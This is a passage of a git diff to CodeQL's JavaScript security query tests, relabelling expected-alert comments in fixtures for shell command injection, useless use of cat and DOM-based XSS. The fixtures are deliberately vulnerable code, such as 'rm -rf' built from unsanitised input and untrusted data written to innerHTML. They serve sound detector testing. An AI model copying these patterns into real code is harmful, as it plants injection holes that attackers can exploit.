["-rf", name], {shell: true}); @@ -557,40 +557,40 @@ module.exports.shellThing = function (name) { module.exports.badSanitizer = function (name) { if (!name.match(/^(.|\.){1,64}$/)) { // <- bad sanitizer - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert } else { - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert } if (!name.match(/^\w{1,64}$/)) { // <- good sanitizer - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert } else { - exec("rm -rf " + name); // OK + exec("rm -rf " + name); } } module.exports.safeWithBool = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (isSafeName(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (isSafeName(name) === true) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isSafeName(name) !== false) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isSafeName(name) == false) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } function indirectThing(name) { @@ -606,36 +606,36 @@ function moreIndirect(name) { } module.exports.veryIndeirect = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (indirectThing(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (indirectThing2(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (moreIndirect(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (moreIndirect(name) !== false) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } module.exports.sanitizer = function (name) { var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // NOT OK + cp.exec("rm -rf " + sanitized); // $ Alert var sanitized = "'" + name.replace(new RegExp("\'", 'g'), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); var sanitized = "'" + name.replace(new RegExp("\'", unknownFlags()), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK -- Most likely should be okay and not flagged to reduce false positives. + cp.exec("rm -rf " + sanitized); // OK - Most likely should be okay and not flagged to reduce false positives. } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js index db1ecd02413f..6dc040fd7800 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js @@ -1,9 +1,9 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - is imported from main module. + cp.exec("rm -rf " + name); // $ Alert - is imported from main module. }; module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK - is imported from main module. + cp.exec("rm -rf " + name); // $ Alert - is imported from main module. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js index b107ac03d7ae..1f512e8c3817 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js @@ -1,5 +1,5 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // OK, is not exported to a main-module. + cp.exec("rm -rf " + name); // OK - is not exported to a main-module. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js index a594c2182392..df2b9bd82e60 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js @@ -1,5 +1,5 @@ const cp = require("child_process"); module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - this function is exported from `amd.js` + cp.exec("rm -rf " + name); // $ Alert - this function is exported from `amd.js` }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js index 6e7d3498723d..ba4bd7089693 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js @@ -1,15 +1,15 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. }; module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK - this is being called explicitly from child_process-test.js + cp.exec("rm -rf " + name); // $ Alert - this is being called explicitly from child_process-test.js }; module.exports.amd = require("./amd.js"); module.exports.arrToShell = function (cmd, arr) { - cp.spawn("echo", arr, {shell: true}); // NOT OK + cp.spawn("echo", arr, {shell: true}); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts index 1e945f15e724..f2e6b7672f89 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") export default function (name) { - cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file. + cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file. } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js index c46fed331815..67890f50fe82 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js @@ -1,5 +1,5 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file. + cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts index 9fa88413cc88..8a79d2d66a66 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js index 952288a82cef..bc9e51562033 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js @@ -1,5 +1,5 @@ const cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js index 9654b26dec03..d5230dab17f5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js @@ -7,21 +7,21 @@ var spawnSync = child_process.spawnSync; var fs = require('fs'); var app = express(); -exec("cat foo/bar", function (err, out) {}); // NOT OK +exec("cat foo/bar", function (err, out) {}); // $ Alert -exec("cat /proc/" + id + "/status", function (err, out) { // NOT OK +exec("cat /proc/" + id + "/status", function (err, out) { // $ Alert console.log(out); }); -execSync('cat /proc/cpuinfo').toString(); // NOT OK. +execSync('cat /proc/cpuinfo').toString(); // $ Alert -execSync(`cat ${newpath}`) // NOT OK +execSync(`cat ${newpath}`) // $ Alert execSync('cat package.json | wc -l'); // OK - pipes! -execSync('cat /proc/cpuinfo /foo/bar').toString(); // OK multiple files. +execSync('cat /proc/cpuinfo /foo/bar').toString(); // OK - multiple files. -execSync(`cat ${newpath} /foo/bar`).toString(); // OK multiple files. +execSync(`cat ${newpath} /foo/bar`).toString(); // OK - multiple files. exec(`cat ${newpath} | grep foo`, function (err, out) { }) // OK - pipes @@ -29,73 +29,73 @@ execSync(`cat ${newpath}`, {uid: 1000}) // OK - non trivial options exec('cat *.js | wc -l', { cwd: './' }, function (err, out) { }); // OK - wildcard and pipes -execSync(`cat foo/bar/${newpath}`); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync) +execSync(`cat foo/bar/${newpath}`); // $ Alert - "encoding" is used EXACTLY the same way in fs.readFileSync -execSync(`cat foo/bar/${newpath}`, {encoding: 'utf8'}); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync) +execSync(`cat foo/bar/${newpath}`, {encoding: 'utf8'}); // $ Alert - "encoding" is used EXACTLY the same way in fs.readFileSync -execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'}); // OK (fs.readFileSync cannot emulate uid / gid)) +execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'}); // OK - (fs.readFileSync cannot emulate uid / gid)) -execSync('cat /proc/cpuinfo > foo/bar/baz').toString(); // OK. +execSync('cat /proc/cpuinfo > foo/bar/baz').toString(); -execSync(`cat ${newpath} > ${destpath}`).toString(); // OK. +execSync(`cat ${newpath} > ${destpath}`).toString(); -execSync(`cat ${files.join(' ')} > ${outFile}`); // OK +execSync(`cat ${files.join(' ')} > ${outFile}`); -execSync(`cat ${files.join(' ')}`); // OK - but flagged - not just a simple file read [INCONSISTENCY] +execSync(`cat ${files.join(' ')}`); // $ SPURIOUS: Alert - - but flagged - not just a simple file read exec("cat /proc/cpuinfo | grep name"); // OK - pipes execSync(`cat ${newpath} | ${othertool}`); // OK - pipes function cat(file) { - return execSync('cat ' + file).toString(); // NOT OK + return execSync('cat ' + file).toString(); // $ Alert } -execSync("sh -c 'cat " + newpath + "'"); // NOT OK - but not flagged [INCONSISTENCY] +execSync("sh -c 'cat " + newpath + "'"); // $ MISSING: Alert var execFile = child_process.execFile; var execFileSync = child_process.execFileSync; -execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // NOT OK +execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // $ Alert // Not using stderr console.log(stdout); }); -execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // OK. - stderr is used. +execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // OK - - stderr is used. console.log(stderr); }); -execFile('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}, function(error, stdout, stderr ) { // NOT OK +execFile('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}, function(error, stdout, stderr ) { // $ Alert // Not using stderr console.log(stdout); }); -execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}); // $ Alert -execFileSync('/bin/cat', [ 'pom.xml' ]); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ]); // $ Alert var opts = {encoding: 'utf8'}; -execFileSync('/bin/cat', [ 'pom.xml' ], opts); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], opts); // $ Alert var anOptsFileNameThatIsTooLongToBePrintedByToString = {encoding: 'utf8'}; -execFileSync('/bin/cat', [ 'pom.xml' ], anOptsFileNameThatIsTooLongToBePrintedByToString); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], anOptsFileNameThatIsTooLongToBePrintedByToString); // $ Alert -execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'someEncodingValueThatIsCompletelyBogusAndTooLongForToString'}); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'someEncodingValueThatIsCompletelyBogusAndTooLongForToString'}); // $ Alert -execFileSync('/bin/cat', [ "foo/" + newPath + "bar" ], {encoding: 'utf8'}); // NOT OK +execFileSync('/bin/cat', [ "foo/" + newPath + "bar" ], {encoding: 'utf8'}); // $ Alert -execSync('cat /proc/cpuinfo' + foo).toString(); // NOT OK. +execSync('cat /proc/cpuinfo' + foo).toString(); // $ Alert -execFileSync('/bin/cat', [ `foo/bar/${newpath}` ]); // NOT OK +execFileSync('/bin/cat', [ `foo/bar/${newpath}` ]); // $ Alert execFileSync('node', [ `foo/bar/${newpath}` ]); // OK - not a call to cat -exec("cat foo/bar", function (err, out) {}); // NOT OK +exec("cat foo/bar", function (err, out) {}); // $ Alert -exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK +exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert -exec("cat foo/bar", (err, out) => doSomethingWith(out)); // NOT OK +exec("cat foo/bar", (err, out) => doSomethingWith(out)); // $ Alert execFileSync('/bin/cat', [ 'pom.xml' ], unknownOptions); // OK - unknown options. @@ -118,13 +118,13 @@ spawn('cat', { stdio: ['pipe', stdin, 'inherit'] }); // OK - Non trivial use. (B cat.stdout.on('end', () => res.end()); })(); -var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK +var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert -var notDead = exec("cat foo/bar", (err, out) => {console.log(out)}); // OK +var notDead = exec("cat foo/bar", (err, out) => {console.log(out)}); console.log(notDead); (function () { - var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK + var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert someCall( exec("cat foo/bar", (err, out) => {console.log(out)}) // OK - non-trivial use of returned proccess. @@ -133,34 +133,34 @@ console.log(notDead); return exec("cat foo/bar", (err, out) => {console.log(out)}); // OK - non-trivial use of returned proccess. })(); -const stdout2 = execSync('cat /etc/dnsmasq.conf', { // NOT OK. +const stdout2 = execSync('cat /etc/dnsmasq.conf', { // $ Alert encoding: 'utf8' }); -exec('/bin/cat', function (e, s) {}); // OK +exec('/bin/cat', function (e, s) {}); -spawn("cat") // OK +spawn("cat") var shelljs = require("shelljs"); -shelljs.exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK -shelljs.exec("cat foo/bar", {encoding: 'utf8'}); // NOT OK -shelljs.exec("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK +shelljs.exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert +shelljs.exec("cat foo/bar", {encoding: 'utf8'}); // $ Alert +shelljs.exec("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // $ Alert let cspawn = require('cross-spawn'); -cspawn('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK -cspawn('cat', ['foo/bar'], { encoding: 'utf8' }, (err, out) => {console.log(out)}); // NOT OK -cspawn('cat', ['foo/bar'], (err, out) => {console.log(out)}); // NOT OK -cspawn('cat', ['foo/bar']); // NOT OK -cspawn('cat', (err, out) => {console.log(out)}); // OK -cspawn('cat', { encoding: 'utf8' }); // OK +cspawn('cat', ['foo/bar'], { encoding: 'utf8' }); // $ Alert +cspawn('cat', ['foo/bar'], { encoding: 'utf8' }, (err, out) => {console.log(out)}); // $ Alert +cspawn('cat', ['foo/bar'], (err, out) => {console.log(out)}); // $ Alert +cspawn('cat', ['foo/bar']); // $ Alert +cspawn('cat', (err, out) => {console.log(out)}); +cspawn('cat', { encoding: 'utf8' }); -let myResult = cspawn.sync('cat', ['foo/bar']); // NOT OK -let myResult = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK +let myResult = cspawn.sync('cat', ['foo/bar']); // $ Alert +let myResult = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // $ Alert var execmod = require('exec'); -execmod("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK -execmod("cat foo/bar", {encoding: 'utf8'}); // NOT OK -execmod("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK +execmod("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert +execmod("cat foo/bar", {encoding: 'utf8'}); // $ Alert +execmod("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js index 97d21371d082..8d4a8cac6d0a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js @@ -1,16 +1,16 @@ this.addEventListener('message', function(event) { - document.write(event.data); // NOT OK + document.write(event.data); // $ Alert }) this.addEventListener('message', function({data}) { - document.write(data); // NOT OK + document.write(data); // $ Alert }) function test() { function foo(x, event, y) { - document.write(x.data); // OK - document.write(event.data); // NOT OK - document.write(y.data); // OK + document.write(x.data); + document.write(event.data); // $ Alert + document.write(y.data); } window.addEventListener("message", foo.bind(null, {data: 'items'})); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js index 37d3388ee784..1b186b7db6a4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js @@ -1,12 +1,12 @@ angular.module('myApp', []) .directive('myCustomer', function() { return { - templateUrl: "SAFE" // OK + templateUrl: "SAFE" } }) .directive('myCustomer', function() { return { - templateUrl: Cookie.get("unsafe") // NOT OK + templateUrl: Cookie.get("unsafe") // $ Alert } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts index 6d1823c2f601..66cde9439328 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts @@ -21,29 +21,29 @@ export class AppComponent implements OnInit { ) {} ngOnInit() { - this.sanitizer.bypassSecurityTrustHtml(ɵgetDOM().getLocation().href); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(ɵgetDOM().getLocation().href); // $ Alert - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.params.foo); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParams.foo); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.fragment); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.paramMap.get('foo')); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParamMap.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.params.foo); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParams.foo); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.fragment); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.paramMap.get('foo')); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParamMap.get('foo')); // $ Alert this.route.paramMap.subscribe(map => { - this.sanitizer.bypassSecurityTrustHtml(map.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(map.get('foo')); // $ Alert }); - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].path); // NOT OK - though depends on route config - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameters.x); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.get('x')); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.params.x); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].path); // $ Alert - though depends on route config + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameters.x); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.get('x')); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.params.x); // $ Alert - this.sanitizer.bypassSecurityTrustHtml(this.router.url); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.router.url); // $ Alert - this.sanitizer2.bypassSecurityTrustHtml(this.router.url); // NOT OK - this.renderer.setProperty(this.document.documentElement, 'innerHTML', this.route.snapshot.queryParams.foo); // NOT OK + this.sanitizer2.bypassSecurityTrustHtml(this.router.url); // $ Alert + this.renderer.setProperty(this.document.documentElement, 'innerHTML', this.route.snapshot.queryParams.foo); // $ Alert } someMethod(routeSnapshot: ActivatedRouteSnapshot) { - this.sanitizer.bypassSecurityTrustHtml(routeSnapshot.paramMap.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(routeSnapshot.paramMap.get('foo')); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js index a0e75045a2eb..8cda29a4e952 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js @@ -4,15 +4,15 @@ import classNamesB from 'classnames/bind'; import clsx from 'clsx'; function main() { - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; // $ Alert let unsafeStyle = classNames.bind({foo: window.name}); - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert let safeStyle = classNames.bind({}); - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // OK - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; + document.body.innerHTML = `Hello`; // $ Alert - document.body.innerHTML += `Hello`; // NOT OK + document.body.innerHTML += `Hello`; // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts index b87d5a43beea..161a1d6bdd82 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts @@ -12,7 +12,7 @@ function paste(e) { const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -21,16 +21,16 @@ function paste(e) { export function install(el: HTMLElement): void { el.addEventListener('paste', (e) => { - $("#id").html(e.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.clipboardData.getData('text/html')); // $ Alert }) } document.addEventListener('paste', (e) => { - $("#id").html(e.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.clipboardData.getData('text/html')); // $ Alert }); $("#foo").bind('paste', (e) => { - $("#id").html(e.originalEvent.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.originalEvent.clipboardData.getData('text/html')); // $ Alert }); (function () { @@ -47,7 +47,7 @@ $("#foo").bind('paste', (e) => { const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -96,6 +96,6 @@ async function getClipboardData(e: ClipboardEvent): Promise if (!dataTransfer) return; const html = dataTransfer.getData('text/html'); - $("#id").html(html); // NOT OK + $("#id").html(html); // $ Alert }); })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js index 9177f08bdc5c..dfa55453917a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js @@ -2,6 +2,6 @@ import * as dummy from 'dummy'; class CustomElm extends HTMLElement { test() { - this.innerHTML = window.name; // NOT OK + this.innerHTML = window.name; // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js index 1bb64b48b214..c84f169995cb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js @@ -8,15 +8,15 @@ function doSomething() { d3.select('#main') .attr('width', 100) .style('color', 'red') - .html(getTaint()) // NOT OK - .html(d => getTaint()) // NOT OK + .html(getTaint()) // $ Alert + .html(d => getTaint()) // $ Alert .call(otherFunction) - .html(d => getTaint()); // NOT OK + .html(d => getTaint()); // $ Alert } function otherFunction(selection) { selection .attr('foo', 'bar') - .html(getTaint()); // NOT OK + .html(getTaint()); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js index 47513c796d96..97363f790da1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js @@ -8,17 +8,17 @@ function main() { let time = new Date(); let taint = decodeURIComponent(window.location.hash.substring(1)); - document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dateFnsFp.format(taint)(time)}`; // NOT OK + document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dateFnsFp.format(taint)(time)}`; // $ Alert document.body.innerHTML = `Time is ${dateFns.format(taint, time)}`; // OK - time arg is safe document.body.innerHTML = `Time is ${dateFnsFp.format(time)(taint)}`; // OK - time arg is safe - document.body.innerHTML = `Time is ${moment(time).format(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${moment(taint).format()}`; // OK - document.body.innerHTML = `Time is ${dateformat(time, taint)}`; // NOT OK + document.body.innerHTML = `Time is ${moment(time).format(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${moment(taint).format()}`; + document.body.innerHTML = `Time is ${dateformat(time, taint)}`; // $ Alert import dayjs from 'dayjs'; - document.body.innerHTML = `Time is ${dayjs(time).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dayjs(time).format(taint)}`; // $ Alert } import LuxonAdapter from "@date-io/luxon"; @@ -34,10 +34,10 @@ function dateio() { const moment = new MomentAdapter(); const dayjs = new DayJSAdapter(); - document.body.innerHTML = `Time is ${dateFns.formatByString(new Date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${luxon.formatByString(luxon.date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${moment.formatByString(moment.date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dayjs.formatByString(dayjs.date(), taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dateFns.formatByString(new Date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${luxon.formatByString(luxon.date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${moment.formatByString(moment.date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dayjs.formatByString(dayjs.date(), taint)}`; // $ Alert } import { DateTime } from "luxon"; @@ -45,18 +45,18 @@ import { DateTime } from "luxon"; function luxon() { let taint = decodeURIComponent(window.location.hash.substring(1)); - document.body.innerHTML = `Time is 